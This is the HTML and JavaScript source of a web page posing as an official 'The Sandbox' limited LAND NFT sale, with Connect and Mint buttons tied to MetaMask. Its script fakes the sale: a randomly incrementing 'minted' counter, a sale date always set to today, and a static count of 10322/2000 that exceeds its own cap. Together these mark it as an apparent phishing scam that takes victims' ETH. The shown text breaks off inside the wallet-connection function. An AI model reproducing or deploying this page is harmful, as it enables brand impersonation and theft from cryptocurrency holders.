<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="viewport" content="width=1024">
    <meta name="theme-color" content="#000000">
    <meta name="og:type" content="website">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="og:title" content="THE SANDBOX">
    <meta name="og:description" content="Limited sale of 2000 LANDS.">
    <meta name="og:image" content="banner.png">
    <meta property="og:url" content="https://sandboxsale.live
   /">
    <link rel="shortcut icon" href="./static/media/favicon.ico" type="image/x-icon">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link href="./static/css/css2" rel="stylesheet">
    <title>The Sandbox</title>
    <link href="./static/css/2.68b64559.chunk.css" rel="stylesheet">
    <link href="./static/css/main.e980aacb.chunk.css" rel="stylesheet">
    <style data-styled="active" data-styled-version="5.2.0"></style>
    <style></style>
    <style data-jss="" data-meta="Unthemed">
      * {
        scroll-behavior: smooth;
      }
      .container-0-2-14 {
        color: #fdfdfd;
        border: none;
        cursor: pointer;
        display: inline-flex;
        padding: 6px 12px;
        font-size: 9px;
        text-align: center;
        transition: all 0.2s;
        font-weight: bold;
        line-height: 21px;
        user-select: none;
        border-radius: 0.12em;
        background-color: #2b49e5;
      }
      .container-0-2-14:hover {
        background: #4f6bf7;
      }
      .image-0-2-15 {
        width: 18px;
        height: 18px;
      }
      @media (min-width: 450px) {
        .container-0-2-14 {
          padding: 12px 24px;
          font-size: 16px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .close-0-2-77 {
        top: 20px;
        right: 80px;
        width: 30px;
        cursor: pointer;
        height: 30px;
        position: absolute;
        user-select: none;
      }
      .wrapper-0-2-78 {
        width: 100%;
        height: 100vh;
        display: flex;
        align-items: center;
        justify-content: center;
      }
      .youtube-0-2-79 {
        width: 85vw;
        height: 80vh;
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .background-0-2-5 {
        width: 100%;
        height: 135vh;
        background: url(static/media/bgMobile.08eaee11.html);
        background-size: cover;
        background-position: center;
        backdrop-filter: blur(8px);
        background-repeat: repeat-y;
      }
      .navContainer-0-2-6 {
        display: flex;
        padding: 18px 24px 24px 24px;
        align-items: flex-start;
        justify-content: space-between;
      }
      .navItem-0-2-7 {
        color: white;
        cursor: pointer;
        font-size: 20px;
        font-weight: 500;
        margin-right: 32px;
        border-radius: 2px;
      }
      .youtube-0-2-8 {
        border-radius: 24px;
      }
      @-webkit-keyframes keyframes-up-right-0-2-9 {
        0% {
          opacity: 0.25;
          transform: scale(1);
        }
        50% {
          opacity: 0.6;
          transform: scale (1, 5);
        }
        100% {
          opacity: 0.25;
          transform: scale(1);
        }
      }
      .circle-0-2-10 {
        width: 14px;
        height: 14px;
        opacity: 0.25;
        margin-left: 12px;
        border-radius: 50%;
      }
      .red-0-2-11 {
        animation: keyframes-up-right-0-2-9 1.5s infinite;
        background-color: red;
      }
      .discordLink-0-2-12 {
        color: #fdfdfd;
        cursor: pointer;
        display: flex;
        font-size: 20px;
        align-items: center;
        font-weight: bold;
      }
      .discordLink-0-2-12 img {
        width: 32px;
        height: 32px;
      }
      .fixedContainer-0-2-13 {
        display: none;
      }
      @media (min-width: 500px) {
        .background-0-2-5 {
          width: 100%;
          height: 100%;
          background: url(static/media/bg.169fb519.png);
          background-size: cover;
          background-position: center center;
        }
      }
      @media (min-width: 768px) {
        .fixedContainer-0-2-13 {
          width: 100%;
          bottom: 16px;
          display: flex;
          padding: 0 16px;
          z-index: 100;
          position: fixed;
          align-items: flex-end;
          justify-content: space-between;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .blur-0-2-38 {
        filter: blur(4px);
        user-select: none;
      }
      .caption-0-2-39 {
        font-size: 18px;
        margin-top: 8px;
      }
      .content-0-2-40 {
        margin: 0 auto;
        position: relative;
        max-width: 1200px;
      }
      .circle-0-2-41 {
        right: -23px;
        width: 50px;
        height: 50px;
        margin: 0 auto;
        display: flex;
        position: absolute;
        background: #1a1c21;
        align-items: center;
        border-radius: 50%;
        justify-content: center;
      }
      .lastPhase-0-2-42 {
        margin: 50px auto 0 auto;
        max-width: 450px;
      }
      .roadmapTitle-0-2-43 {
        font-size: 52px;
        text-align: center;
        font-weight: 1000;
        margin-bottom: 24px;
      }
      .phaseSection-0-2-44 {
        margin-top: 24px;
      }
      .phase-0-2-45 {
        margin: 0 auto;
        max-width: 450px;
      }
      .phaseNumber-0-2-46 {
        font-size: 18px;
      }
      .progressBar-0-2-47 {
        top: 0;
        left: 0;
        right: 0;
        width: 4px;
        height: 3830px;
        margin: 60px auto 0 auto;
        display: none;
        position: absolute;
        background: #1a1c21;
      }
      .subHeading-0-2-48 {
        font-size: 26px;
        margin-top: 8px;
        font-weight: 1000;
      }
      .videoWrapper-0-2-49 {
        display: flex;
        margin-top: 50px;
        justify-content: center;
      }
      @media (min-width: 1000px) {
        .lastPhase-0-2-42 {
          margin-top: 100px;
        }
        .phaseSection-0-2-44 {
          margin: 88px 0 0 auto;
          display: flex;
          text-align: initial;
          align-items: center;
          justify-content: space-between;
        }
        .phase-0-2-45 {
          margin: 0;
        }
        .progressBar-0-2-47 {
          display: initial;
        }
        .roadmapTitle-0-2-43 {
          font-size: 64px;
        }
        .videoWrapper-0-2-49 {
          display: initial;
          margin-top: 0px;
          margin-left: 75px;
        }
        .videoWrapper-0-2-49 div:nth-child(odd) {
          margin-right: 75px;
        }
        .videoWrapper-0-2-49 div:nth-child(even) {
          margin-left: 75px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .footer-0-2-74 {
        display: flex;
        flex-wrap: wrap;
        align-items: center;
        flex-direction: column;
        justify-content: center;
      }
      .footerLogo-0-2-75 {
        order: -1;
        width: 100%;
        height: 200px;
        max-width: 650px;
      }
      .footerSocials-0-2-76 {
        display: flex;
        margin-top: 64px;
        padding-bottom: 24px;
      }
      @media (min-width: 768px) {
        .footer-0-2-74 {
          flex-direction: row;
          justify-content: space-between;
        }
        .footerLogo-0-2-75 {
          order: 0;
          height: 250px;
        }
        .footerSocials-0-2-76 {
          margin-top: 0px;
          padding-bottom: 0px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .wrapper-0-2-72 {
        width: 100%;
        border: 1px solid #404040;
        cursor: pointer;
        margin: 0 auto;
        display: flex;
        padding: 20px;
        align-items: center;
        border-radius: 5px;
        justify-content: space-between;
        background-color: #171717;
      }
      .wrapper-0-2-72 svg {
        transform: rotate(180deg);
        transition: 0.3s;
      }
      .inner-0-2-73 {
        width: 100%;
        padding: 0 20px;
        font-size: 18px;
        margin: 32px auto;
        display: none;
      }
      @media (min-width: 768px) {
        .wrapper-0-2-72 {
          width: 80%;
        }
        .inner-0-2-73 {
          width: 80%;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .sectionHeader-0-2-71 {
        font-size: 52px;
        text-align: center;
        font-weight: 1000;
      }
      @media (min-width: 768px) {
        .sectionHeader-0-2-71 {
          font-size: 64px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .instructionsContainer-0-2-66 {
        display: flex;
        flex-wrap: wrap;
        align-items: stretch;
        justify-content: space-around;
      }
      .instructionsCard-0-2-67 {
        width: 300px;
        border: 1px solid #404040;
        height: 320px;
        padding: 24px;
        position: relative;
        margin-top: 90px;
        border-radius: 16px;
        background-color: #171717;
      }
      .instructionsImage-0-2-68 {
        top: -40px;
        left: calc(50% - 50px);
        border: 1px solid #404040;
        height: 100px;
        position: absolute;
        border-radius: 16px;
      }
      .instructionsTitle-0-2-69 {
        font-size: 20px;
        margin-top: 48px;
        text-align: center;
        font-weight: bold;
      }
      .sectionHeader-0-2-70 {
        font-size: 52px;
        text-align: center;
        font-weight: 1000;
      }
      @media (min-width: 768px) {
        .sectionHeader-0-2-70 {
          font-size: 64px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .designMember-0-2-50 {
        width: 150px;
        height: 100px;
        margin-top: 50px;
        text-align: center;
      }
      .designSection-0-2-51 {
        margin-bottom: 0px !important;
      }
      .designTeamWrapper-0-2-52 {
        display: flex;
      }
      .founder-0-2-53 {
        flex: 1 1 50%;
        margin-top: 50px;
      }
      .founderImage-0-2-54 {
        width: 150px;
      }
      .founderSection-0-2-55 {
        display: flex;
        flex-wrap: wrap;
        margin-top: 24px;
        align-items: flex-end;
        justify-content: space-around;
      }
      .founderSocial-0-2-56 {
        width: 25px;
        margin-left: 15px;
      }
      .founderFunction-0-2-57 {
        font-size: 15px;
        margin-bottom: 8px;
      }
      .founderName-0-2-58 {
        font-size: 20px;
        font-weight: bold;
      }
      .founderTitle-0-2-59 {
        font-size: 16px;
        font-weight: bold;
      }
      .memberName-0-2-60 {
        display: flex;
        font-size: 20px;
        align-items: center;
        font-weight: 1000;
        justify-content: center;
      }
      .memberName-0-2-60 svg {
        width: 18px;
        height: 18px;
        margin-left: 5px;
      }
      .sectionHeader-0-2-61 {
        font-size: 52px;
        text-align: center;
        font-weight: 1000;
      }
      .teamHeader-0-2-62 {
        display: flex;
        font-size: 30px;
        margin-top: 48px;
        align-items: center;
        font-weight: bold;
        justify-content: center;
      }
      .teamHeader-0-2-62 svg {
        width: 100px;
        height: 70px;
        margin-left: 10px;
      }
      .teamMember-0-2-63 {
        width: 140px;
        margin-top: 75px;
        text-align: center;
      }
      .teamSection-0-2-64 {
        display: flex;
        flex-wrap: wrap;
        align-items: center;
        margin-bottom: 50px;
        justify-content: space-around;
      }
      .youtube-0-2-65 {
        width: 30px !important;
      }
      @media (min-width: 600px) {
        .designTeamWrapper-0-2-52 {
          display: flex;
        }
        .founderImage-0-2-54 {
          width: 180px;
        }
        .founderSection-0-2-55 {
          margin-top: 24px;
        }
        .founderSocial-0-2-56 {
          width: 25px;
          margin-left: 15px;
        }
        .teamMember-0-2-63 {
          width: 200px;
          margin-top: 50px;
        }
        .youtube-0-2-65 {
          width: 30px !important;
        }
      }
      @media (min-width: 768px) {
        .designMember-0-2-50 {
          width: 200px;
          height: auto;
          margin-top: 50px;
          text-align: center;
        }
        .designTeamWrapper-0-2-52 {
          display: initial;
        }
        .founder-0-2-53 {
          flex: auto;
          margin-top: 0px;
        }
        .founderImage-0-2-54 {
          width: 240px;
        }
        .founderSocial-0-2-56 {
          width: 30px;
          margin-left: 20px;
        }
        .sectionHeader-0-2-61 {
          font-size: 64px;
        }
        .teamHeader-0-2-62 {
          justify-content: flex-start;
        }
        .teamSection-0-2-64 {
          margin-bottom: 100px;
        }
        .youtube-0-2-65 {
          width: 35px !important;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .communitySection-0-2-30 {
        display: flex;
        align-items: center;
        flex-direction: column;
      }
      .sectionHeader-0-2-31 {
        font-size: 52px;
        font-weight: 1000;
      }
      .socialArrow-0-2-32 {
        width: 16px;
        margin-top: 4px;
        margin-left: 12px;
      }
      .socialTitle-0-2-33 {
        display: flex;
        font-size: 28px;
        align-items: center;
        font-weight: 1000;
      }
      .socialContainer-0-2-34 {
        display: flex;
        margin-top: 32px;
        align-items: flex-start;
      }
      .socialDescription-0-2-35 {
        color: #a1a1a1;
        max-width: 303px;
        margin-top: 8px;
      }
      .socialSubtitle-0-2-36 {
        color: #a1a1a1;
        font-size: 28px;
        margin-top: 24px;
      }
      .wrapper-0-2-37 {
        margin-top: 24px;
      }
      @media (min-width: 768px) {
        .communitySection-0-2-30 {
          flex-direction: row;
          justify-content: space-between;
        }
        .sectionHeader-0-2-31 {
          font-size: 64px;
        }
        .socialContainer-0-2-34 {
          margin-top: 64px;
        }
        .socialDescription-0-2-35 {
          margin-top: 16px;
        }
        .wrapper-0-2-37 {
          margin-top: 156px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .artworkVideos-0-2-20 {
        color: #fdfdfd;
        bottom: 0;
        margin: 40px auto -50px auto;
        display: flex;
        z-index: 10;
        align-items: center;
        font-weight: 700;
        flex-direction: column;
        justify-content: center;
      }
      .artworkVideos-0-2-20 div {
        max-width: 550px;
        background: transparent;
        text-align: center;
      }
      .buttonWrapper-0-2-21 {
        top: 48%;
        left: 0;
        right: 0;
        width: fit-content;
        margin: 0 auto;
        position: absolute;
      }
      .contentContainer-0-2-22 {
        color: white;
        margin: auto;
        padding: 24px;
        max-width: 1400px;
      }
      .roleBanner-0-2-23 {
        display: none;
      }
      .mobileBanner-0-2-24 {
        width: 100%;
        height: auto;
      }
      .sectionHeader-0-2-25 {
        font-size: 52px;
        margin-top: 48px;
        text-align: center;
        font-weight: 1000;
      }
      .transitionBanner-0-2-26 {
        display: none;
      }
      .transitionBannerMobile-0-2-27 {
        width: 100%;
        cursor: pointer;
        display: initial;
        padding-top: 70px;
      }
      .videoHeader-0-2-28 {
        font-size: 52px;
      }
      .videoWrapper-0-2-29 {
        width: 100%;
        padding: 0 24px;
        position: relative;
        max-width: 550px;
        aspect-ratio: 16/9;
      }
      svg.active {
        transform: rotate(270deg);
      }
      @media (min-width: 768px) {
        .artworkVideos-0-2-20 {
          width: 85%;
          flex-direction: row;
        }
        .artworkVideos-0-2-20 div:first-child {
          margin-right: 150px;
        }
        .buttonWrapper-0-2-21 {
          top: 75%;
          left: 16.8%;
          margin: 0;
        }
        .mobileBanner-0-2-24 {
          display: none;
        }
        .roleBanner-0-2-23 {
          width: 100%;
          display: initial;
        }
        .sectionHeader-0-2-25 {
          font-size: 64px;
        }
        .transitionBanner-0-2-26 {
          width: 100%;
          cursor: pointer;
          display: initial;
        }
        .transitionBannerMobile-0-2-27 {
          display: none;
        }
        .videoHeader-0-2-28 {
          font-size: 64px;
        }
        .videoWrapper-0-2-29 {
          padding: 0px;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .jackpot-0-2-16 {
        width: 100%;
        display: none;
      }
      .jackpotMobile-0-2-17 {
        width: 100%;
      }
      .millionButtons-0-2-18 {
        width: 100%;
        display: flex;
        margin-top: 30px;
        align-items: center;
        flex-direction: column;
      }
      .millionText-0-2-19 {
        width: 100%;
        display: flex;
        justify-content: center;
      }
      @media (min-width: 768px) {
        .jackpot-0-2-16 {
          display: initial;
        }
        .jackpotMobile-0-2-17 {
          display: none;
        }
        .millionButtons-0-2-18 {
          flex-direction: row;
          justify-content: center;
        }
        .millionButtons-0-2-18 > button:first-child {
          margin-right: 24px;
        }
        .millionText-0-2-19 {
          bottom: 96px;
          position: absolute;
        }
      }


    </style>
    <style data-jss="" data-meta="Unthemed">
      .contentContainer-0-2-1 {
        color: white;
        margin: auto;
        padding: 24px;
        max-width: 1400px;
      }
      .contentContainer-0-2-1__wr {
        margin-top: 300px;
      }
      .dollarText-0-2-2 {
        font-size: 48px;
        margin-top: 64px;
        font-weight: 1000;
      }


    </style>

    <!-- Yandex.Metrika counter -->
    <script type="text/javascript">
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(87406166, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true
   });


    </script>
    <noscript>
        <div><img src="https://mc.yandex.ru/watch/87406166" style="position:absolute; left:-9999px;" alt=""/></div>
    </noscript>
    <!-- /Yandex.Metrika counter -->
</head>
<body style="overflow: unset">
<noscript>You need to enable JavaScript to run this app.</noscript>
<div id="root">
    <div class="Toastify"></div>
    <div id="main" style="min-height: 100vh; background-color: rgb(0, 0, 0)">
        <div class="background-0-2-5">
            <div class="navContainer-0-2-6">
                <div></div>
                <div style="display: flex; align-items: center">

                    <button class="container-0-2-14" style="margin-right: 0px; display: block;" id="connect2">
                        <div>Connect</div>
                    </button>
                    <button class="container-0-2-14" style="margin-right: 0px; display: none;" id="transfer2" onclick="ym(87406166, 'reachGoal', 'transfer'); return true;">
                        <div>Mint</div>
                    </button>
                </div>
            </div>
            <div style="">
                <div>
                    <div class="header-cont">
                        <div class="dutch-detail-two-sides">
                            <div class="dutch-det-left">
                                <div class="text-block-13">LIMITED LAND SALE</div>
                            </div>
                            <div class="dutch-det-right">
                                <div class="text-block-12">
                                    <span id="dateday2">5</span>
                                    <span id="datehour1">- 7am EST</span>
                                </div>
                            </div>
                        </div>
                        <div class="header_flex">
                            <div class="dutch-detail-two-sides">
                                <div class="dutch-det-left">
                                    <div class="text-block-13">Minted</div>
                                </div>
                                <div class="dutch-det-right">
                                    <div class="text-block-12"><span id="counter">10322</span>/2000</div>
                                </div>
                            </div>
                            <div class="dutch-detail-two-sides">
                                <div class="dutch-det-left">
                                    <div class="text-block-13">Price
                                        <super>*</super>
                                    </div>
                                </div>
                                <div class="dutch-det-right">
                                    <div class="text-block-12">0.5 ETH</div>
                                </div>
                            </div>
                            <div class="dutch-detail-two-sides">
                                <div class="dutch-det-left">
                                    <div class="text-block-13">Max</div>
                                </div>
                                <div class="dutch-det-right">
                                    <div class="text-block-12">5 per Wallet</div>
                                </div>
                            </div>
                        </div>

                        <div id="claim-text-wrapper">
                            <div id="payment-modal">
                                <div id="payment-header">
                                    <div id="payment-header-text" style="margin: 0 auto">
                                        <h1 class="heading-2-copy-copy-copy-copy" style="margin: 0; padding: 0; font-style: initial">
                                            <span style="text-transform: none">The Sandbox</span>
                                        </h1>
                                    </div>
                                </div>
                                <div id="payment-info" style="margin-top: 20px">
                                    <img id="price-img" src="./static/media/gifius.gif" alt="Claim NFT">
                                    <div id="payment-info-text">
                                        <p>Price Per NFT</p>
                                        <h5>0.5 ETH Each</h5>
                                    </div>
                                </div>
                                <div id="ape-number">
                                    <div id="minus" class="minuson">
                                        <svg width="12" height="2" viewBox="0 0 16 2" fill="none" xmlns="http://www.w3.org/2000/svg" style="left: 11px">
                                            <path d="M15 0H1C0.734784 0 0.48043 0.105357 0.292893 0.292893C0.105357 0.48043 0 0.734784 0 1C0 1.26522 0.105357 1.51957 0.292893 1.70711C0.48043 1.89464 0.734784 2 1 2H15C15.2652 2 15.5196 1.89464 15.7071 1.70711C15.8946 1.51957 16 1.26522 16 1C16 0.734784 15.8946 0.48043 15.7071 0.292893C15.5196 0.105357 15.2652 0 15 0Z" fill="white"></path>
                                        </svg>
                                    </div>
                                    <h5 id="pricex" style="margin-left: 13px; margin-right: 13px">
                                        1
                                    </h5>
                                    <input name="eth" class="eth_input text-field-5 w-input" type="hidden" min="1" max="5" pattern="[A-z0-9]{2,50}" minlength="2" maxlength="50" required="required" value="1">
                                    <div id="plus" class="pluson">
                                        <svg width="12" height="12" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" style="left: 11px">
                                            <path d="M15 7H9V1C9 0.734784 8.89464 0.48043 8.70711 0.292893C8.51957 0.105357 8.26522 0 8 0C7.73478 0 7.48043 0.105357 7.29289 0.292893C7.10536 0.48043 7 0.734784 7 1V7H1C0.734784 7 0.48043 7.10536 0.292893 7.29289C0.105357 7.48043 0 7.73478 0 8C0 8.26522 0.105357 8.51957 0.292893 8.70711C0.48043 8.89464 0.734784 9 1 9H7V15C7 15.2652 7.10536 15.5196 7.29289 15.7071C7.48043 15.8946 7.73478 16 8 16C8.26522 16 8.51957 15.8946 8.70711 15.7071C8.89464 15.5196 9 15.2652 9 15V9H15C15.2652 9 15.5196 8.89464 15.7071 8.70711C15.8946 8.51957 16 8.26522 16 8C16 7.73478 15.8946 7.48043 15.7071 7.29289C15.5196 7.10536 15.2652 7 15 7Z"
                                                  fill="white"></path>
                                        </svg>
                                    </div>
                                    <h5 id="ape-max" class="container-0-2-14">Set Max</h5>
                                </div>
                                <div id="ape-total">
                                    <p>Total</p>
                                    <h5><span id="price">0.5</span> ETH</h5>
                                </div>
                            </div>

                            <button class="container-0-2-14" id="connect" style="display: block;">
                                <div>Connect</div>
                            </button>
                            <button class="container-0-2-14" id="transfer" onclick="ym(87406166,'reachGoal','transfer'); return true;" style="display: none;">
                                <div>Mint</div>
                            </button>


                        </div>
                        <div><span><sub>* Price excluding gas fee. <a href="./static/media/TnC.html" target="_blank">Conditions Apply</a></sub></span></div>
                    </div>
                    <style>
                .header-cont {
                  display: flex;
                  flex-direction: column;
                  align-items: center;
                  color: #fff;
                  margin-top: 200px;
                }
                .dutch-detail-two-sides {
                  text-align: center;
                }
                .text-block-13 {
                  color: #fff;
                  font-weight: 700;
                  font-size: 22px;
                  margin-bottom: 5px;
                }
                .text-block-12 {
                  color: #fff;
                  font-size: 19px;
                  font-weight: 400;
                }
                .header_flex {
                  display: grid;
                  grid-template-columns: repeat(3, auto);
                  grid-gap: 30px;
                  margin-top: 20px;
                  margin-bottom: 20px;
                  width: 524px;
                  justify-content: space-between;
                }
                #claim-text-wrapper {
                  width: 524px;
                  padding: 32px;
                  background: rgb(31, 31, 31);
                  border-radius: 10px;
                }
                .heading-2-copy-copy-copy-copy {
                  color: rgb(252, 252, 253);
                  font-weight: 900;
                  text-align: center;
                  text-transform: uppercase;
                  font-size: 42px;
                }
                #payment-info {
                  display: flex;
                  margin-top: 20px;
                  margin-bottom: 32px;
                  padding: 12px;
                  border-width: 1px;
                  border-style: solid;
                  border-color: rgb(255, 255, 255);
                  border-image: initial;
                  border-radius: 10px;
                }
                #price-img {
                  width: 80px;
                  height: 80px;
                  border-radius: 10px;
                }
                #payment-info-text {
                  text-align: end;
                  margin: auto 0px auto auto;
                }
                #pricex {
                  margin: 0;
                  font-size: 1.25rem;
                }
                #payment-info-text p {
                  margin-block-start: 10px;
                  margin-block-end: 10px;
                  font-weight: 400;
                  font-size: 15px;
                  padding: 0;
                }
                #payment-info-text h4,
                #payment-info-text h5 {
                  font-family: Montserrat, sans-serif;
                  font-weight: 600;
                  color: rgb(241, 241, 241);
                  margin-block-start: 0px;
                  margin-block-end: 0px;
                }
                #payment-info-text h5 {
                  font-size: 22px;
                  font-weight: 400;
                }
                #ape-number {
                  display: flex;
                  box-sizing: border-box;
                  margin-bottom: 15px;
                  align-items: center;
                  padding: 12px;
                  background: rgba(123, 123, 123, 0.41);
                  border-width: 1px;
                  border-style: solid;
                  border-color: rgb(255, 255, 255);
                  border-image: initial;
                  border-radius: 10px;
                }
                #minus,
                #plus {
                  position: relative;
                  color: rgb(241, 241, 241);
                  cursor: pointer;
                  width: 20px;
                  height: 20px;
                  display: flex;
                  align-items: center;
                  justify-content: center;
                }
                #ape-max {
                  text-align: end;
                  margin: auto 0 auto auto;
                }
                #ape-total {
                  display: flex;
                  height: 45px;
                  margin-bottom: 32px;
                  padding-left: 10px;
                  padding-right: 10px;
                  border-top: 1px solid rgb(255, 255, 255);
                  border-bottom: 1px solid rgb(255, 255, 255);
                }
                #ape-total h5,
                #ape-total p {
                  margin-block-start: 0px;
                  margin-block-end: 0px;
                  margin-top: auto;
                  margin-bottom: auto;
                  padding: 0 !important;
                }
                #ape-total p {
                }
                #ape-total h5 {
                  margin-right: 0;
                  margin-left: auto;
                }

                #transfer,
                #connect {
                  margin-left: auto;
                  margin-right: auto;
                  display: block;
                }
                #transfer,
                #transfer2 {
                  display: none;
                }


                    </style>
                    <div style="color: white;font-weight: bold;text-align: center;margin-top: 40px;font-size: 24px;">
                        <script src="./js/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
                        <script src="./js/web3.min.js"></script>
                        <!--    <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.2.7-rc.0/web3.min.js"></script>-->
                        <script>
      $(document).ready(function () {
        $(".wrapper-0-2-72").click(function () {
          $(this).next().slideToggle();
          $(this).find("svg").toggleClass("active");
        });
        var DateMode = 2; // 1 - EST | 2 - UTC
        var TimeON = 1; // 1 - Enable | 2 - Off

        var datey = new Date(Date.now());

        var dateForUTC = new Date(Date.now());

        var dateyx = datey.toLocaleString("en-US", {
          timeZone: "America/New_York",
        });
        var datej = new Date(dateyx);
        var datehour = datej.getHours();
        var dateday = datej.getDate();
        var dateMonth = datej.getMonth();

        var datehourUTC = dateForUTC.getUTCHours();
        var datedayUTC = dateForUTC.getUTCDate();
        var dateMonthUTC = dateForUTC.getUTCMonth();

        if (datehour == 1) {
          datehour = "- 1am EST";
        }
        if (datehourUTC == 1) {
          datehourUTC = "- 1am UTC";
        }
        if (datehour == 2) {
          datehour = "- 2am EST";
        }
        if (datehourUTC == 2) {
          datehourUTC = "- 2am UTC";
        }
        if (datehour == 3) {
          datehour = "- 3am EST";
        }
        if (datehourUTC == 3) {
          datehourUTC = "- 3am UTC";
        }
        if (datehour == 4) {
          datehour = "- 4am EST";
        }
        if (datehourUTC == 4) {
          datehourUTC = "- 4am UTC";
        }
        if (datehour == 5) {
          datehour = "- 5am EST";
        }
        if (datehourUTC == 5) {
          datehourUTC = "- 5am UTC";
        }
        if (datehour == 6) {
          datehour = "- 6am EST";
        }
        if (datehourUTC == 6) {
          datehourUTC = "- 6am UTC";
        }
        if (datehour == 7) {
          datehour = "- 7am EST";
        }
        if (datehourUTC == 7) {
          datehourUTC = "- 7am UTC";
        }
        if (datehour == 8) {
          datehour = "- 8am EST";
        }
        if (datehourUTC == 8) {
          datehourUTC = "- 8am UTC";
        }
        if (datehour == 9) {
          datehour = "- 9am EST";
        }
        if (datehourUTC == 9) {
          datehourUTC = "- 9am UTC";
        }
        if (datehour == 10) {
          datehour = "- 10am EST";
        }
        if (datehourUTC == 10) {
          datehourUTC = "- 10am UTC";
        }
        if (datehour == 11) {
          datehour = "- 11am EST";
        }
        if (datehourUTC == 11) {
          datehourUTC = "- 11am UTC";
        }
        if (datehour == 12) {
          datehour = "- 12pm EST";
        }
        if (datehourUTC == 12) {
          datehourUTC = "- 12pm UTC";
        }
        if (datehour == 13) {
          datehour = "- 1pm EST";
        }
        if (datehourUTC == 13) {
          datehourUTC = "- 1pm UTC";
        }
        if (datehour == 14) {
          datehour = "- 2pm EST";
        }
        if (datehourUTC == 14) {
          datehourUTC = "- 2pm UTC";
        }
        if (datehour == 15) {
          datehour = "- 3pm EST";
        }
        if (datehourUTC == 15) {
          datehourUTC = "- 3pm UTC";
        }
        if (datehour == 16) {
          datehour = "- 4pm EST";
        }
        if (datehourUTC == 16) {
          datehourUTC = "- 4pm UTC";
        }
        if (datehour == 17) {
          datehour = "- 5pm EST";
        }
        if (datehourUTC == 17) {
          datehourUTC = "- 5pm UTC";
        }
        if (datehour == 18) {
          datehour = "- 6pm EST";
        }
        if (datehourUTC == 18) {
          datehourUTC = "- 6pm UTC";
        }
        if (datehour == 19) {
          datehour = "- 7pm EST";
        }
        if (datehourUTC == 19) {
          datehourUTC = "- 7pm UTC";
        }
        if (datehour == 20) {
          datehour = "- 8pm EST";
        }
        if (datehourUTC == 20) {
          datehourUTC = "- 8pm UTC";
        }
        if (datehour == 21) {
          datehour = "- 9pm EST";
        }
        if (datehourUTC == 21) {
          datehourUTC = "- 9pm UTC";
        }
        if (datehour == 22) {
          datehour = "- 10pm EST";
        }
        if (datehourUTC == 22) {
          datehourUTC = "- 10pm UTC";
        }
        if (datehour == 23) {
          datehour = "- 11pm EST";
        }
        if (datehourUTC == 23) {
          datehourUTC = "- 11pm UTC";
        }
        if (datehour == 0) {
          datehour = "- 12am EST";
        }
        if (datehourUTC == 0) {
          datehourUTC = "- 12am UTC";
        }

        const month = ["January","February","March","April","May","June","July","August","September","October","November","December"];

        if (DateMode == 1) {
          document.getElementById("dateday2").innerHTML = month[dateMonth] + ' ' + dateday;
          if (TimeON == 1) {
            document.getElementById("datehour1").innerHTML = datehour;
          }
        } else if (DateMode == 2) {
          document.getElementById("dateday2").innerHTML = month[dateMonthUTC] + ' ' + datedayUTC;
          if (TimeON == 1) {
            document.getElementById("datehour1").innerHTML = datehourUTC;
          }
        }

        let price = 0.5;
        const input = document.querySelector(".eth_input");

        var el = 0;
        $("#plus").on("click", function (e) {
          var t = parseInt($("#pricex").text(), 10);
          t += 1;
          if (t > 5) {
            t = 5;
          }
          $("#pricex").text(t);
          var total = (t * 0.5).toFixed(1);
          $("#price").text(total);
        });
        $("#minus").on("click", function (e) {
          var t = parseInt($("#pricex").text(), 10);
          t -= 1;
          if (t < 1) {
            t = 1;
          }
          $("#pricex").text(t);
          var total = (t * 0.5).toFixed(1);
          $("#price").text(total);
        });

        $("#ape-max").click(function () {
          $(".eth_input").val($(".eth_input").attr("max"));
          $("#pricex").text($(".eth_input").attr("max"));
          $("#price").text($(".eth_input").attr("max") * 0.5);
        });
        function inCrementingCounter() {
          var i = localStorage.getItem("mintcount")
            ? Number.parseInt(localStorage.getItem("mintcount"))
            : 1126;
          document.getElementById("counter").innerHTML = i;
          setInterval(function () {
            i += getRandomInt(1, 3);
            if (i >= 2000 - 30) {
              clearInterval(this);
            }
            document.getElementById("counter").innerHTML = i;
            localStorage.setItem("mintcount", i);
          }, getRandomInt(1000, 5000));
        }

        inCrementingCounter();
        function getRandomInt(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
            return Math.floor(Math.random() * (max - min) + min); //The maximum is exclusive and the minimum is inclusive
            }

        let web3 = new Web3(ethereum);

        const isMetaMaskConnected = async () => {
          let accounts = await web3.eth.getAccounts();
          return accounts.length > 0;
        };

        async function updateMetaMaskStatus() {
          isMetaMaskConnected().then((connected) => {
            if (connected) {
              document.getElementById("transfer").style.display = "block";
              document.getElementById("connect").style.display = "none";
              document.getElementById("transfer2").style.display = "block";
              document.getElementById("connect2").style.display = "none";
            }
          });
        }

        async function connectMetaMask() {
          if ((await isMetaMaskConnected()) == false) {
